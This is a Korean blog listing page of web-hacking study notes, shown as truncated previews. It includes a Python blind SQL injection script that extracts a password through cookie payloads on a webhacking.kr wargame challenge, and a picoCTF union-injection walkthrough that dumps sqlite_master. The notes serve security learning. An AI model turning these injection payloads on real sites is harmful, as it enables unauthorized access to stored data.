목록Study/웹 (13)
메모장 입니다2
https://crattack.tistory.com/entry/WEB-Blind-SQL-Injection-%EA%B3%B5%EA%B2%A9-%EB%B0%A9%EB%B2%95 [WEB] Blind SQL Injection 공격 방법 참고 - http://blog.naver.com/funny303/220778035079 - http://pypie.tistory.com/entry/Blind-SQL-Injection - http://www.securityidiots.com/Web-Pentest/SQL-Injection/Blind-SQL-Injection.html 1. SQL Inje.. crattack.tistory.com

1. 풀어야함 - 2번(거의 다 품), 13번, 30번(버그때문에 안풀림), 52번(취약점 이해한 다음에 풀어야함)
import re, urllib2pw=""my_cookie = "1"url = "http://webhacking.kr/challenge/web/web-02"cookieHeader= "" for i in range(1, 11):for j in range(33, 126):req=urllib2.Request(url)cookieHeader= "time=1234567890 and (select ascii(substring(password, {}, 1)) from FreeB0aRd)={}; PHPSESSID={}".format(i, j, my_cookie)print cookieHeaderreq.add_header('cookie', cookieHeader)read=urllib2.urlopen(req).read()pr..
https://www.w3schools.com/sql/sql_like.asp 1.개요 -특정 문자열 패턴 찾기.>예시`A 속성에 asdf로 시작하는 값을 출력``B 속성에 sd가 포함되는 값을 출력` -기호`%`>모든 것을 나타냄. (*와 같음)>사용법`%s`: s로 끝나는 값`a%`: a로 시작하는 값`_`>위치를 나타냄>사용법`_a`: 두번째 값이 a
http://shell2017.picoctf.com:50309/ 1. 개요 -union sql injection 문제 -구성>로그인 전로그인/가입 페이지>로그인 후포스트 작성/포스트 확인 페이지 2.문제 -로그인창에서는 인젝션이 되지 않음. (모두 문자열로 처리되는듯)>하지만, 가입창에서는 아이디에 싱글쿼터를 이용한 sql 인젝션이 가능하다. -아이디를 'a 등으로 가입한 후 로그인 하면포스트 확인을 위한 질의시 쿼리에러가 발생하면서 쿼리문이 그대로 노출됨. -문제 힌트에 나오듯 sqlite를 사용.>sqlite에서는 sqlite_master 라는 테이블이 존재하고, 이 테이블을 조회할 경우 모든 테이블, 속성 정보를 확인할 수 있다.>>아이디를 ' union select 1,name,sql from s..